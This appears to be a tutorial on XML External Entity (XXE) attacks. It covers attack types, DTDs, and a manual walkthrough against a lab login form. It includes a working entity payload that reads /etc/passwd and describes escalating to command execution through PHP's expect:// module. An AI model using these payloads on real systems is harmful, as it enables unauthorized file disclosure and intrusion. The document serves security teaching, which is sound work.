XML External Entity (XXE)

Introduction

An XML External Entity (XXE) attack is a vulnerability that abuses features of XML parsers/data. It often allows an attacker to interact with any backend or external systems that the application itself can access and can allow the attacker to read the file on that system. They can also cause Denial of Service (DoS) attack or could use XXE to perform Server-Side Request Forgery (SSRF) inducing the web application to make requests to other applications. XXE may even enable port scanning and lead to remote code execution.


Types

There are two types of XXE attacks: in-band and out-of-band (OOB-XXE).

1) An in-band XXE

attack is the one in which the attacker can receive an immediate response to the XXE payload.

2) Out-of-band XXE attacks (also called blind XXE)

there is no immediate response from the web application and attacker has to reflect the output of their XXE payload to some other file or their own server.


Document Type Definition (DTD)

A DTD defines the structure and the legal elements and attributes of an XML document.

  • <!DOCTYPE note [ <!ELEMENT note (to,from,heading,body)> <!ELEMENT to (#PCDATA)> <!ELEMENT from (#PCDATA)> <!ELEMENT heading (#PCDATA)> <!ELEMENT body (#PCDATA)> ]>

  • ```

    falcon feast hacking XXE attack ```


XXE Payloads

We are defining a ENTITY called name and assigning it a value feast. Later we are using that ENTITY in our code.

  •    <!DOCTYPE replace [<!ENTITY name "feast"> ]>
       <userInfo>
    	<firstName>falcon</firstName>
    	<lastName>&name;</lastName>
       </userInfo>

    We can also use XXE to read some file from the system by defining an ENTITY and having it use the SYSTEM keyword

  • <?xml version="1.0"?>
    <!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
    <root>&read;</root>

Manual Exploitation

  1. we start off with a simple login application

  2. Let's fill it with random data and examine the request in burp.

  3. It seems all of our data is being put into XML format, and is being posted to "process.php". Let's send the request and see what we get.

  4. This is very promising, because it returns the output of one of the XML fields, meaning we may be able to view the contents of files on the filesystem. Further playing with the requests, tells me that it returns the email field.

  5. Let's try creating an entity that has the value of /etc/passwd. We can do this by once again using the amazing repository PayloadsAllTheThings.

  6. We have XXE! Typically this is the best case scenario, we can get the output of files on the system, and from that we could enumerate further. There is however, a chance that we could get RCE from XXE if the php expect module is loaded. Let's try doing that.All expect is a php module that allows you to run commands.

  7. Fortunately for us, we can use "expect://". Even with XXE this module especially is not guaranteed, meaning that a user has to manually install it, so don't immediately go for the RCE.


Automatic Exploitation

XXE can't really be automatically exploited, as you can't guarantee xml data will be the same, and which payload will or won't work. By the time you figure out that it's vulnerable and make a script to exploit it, you could have a reverse shell or LFI already using burp.


Last updated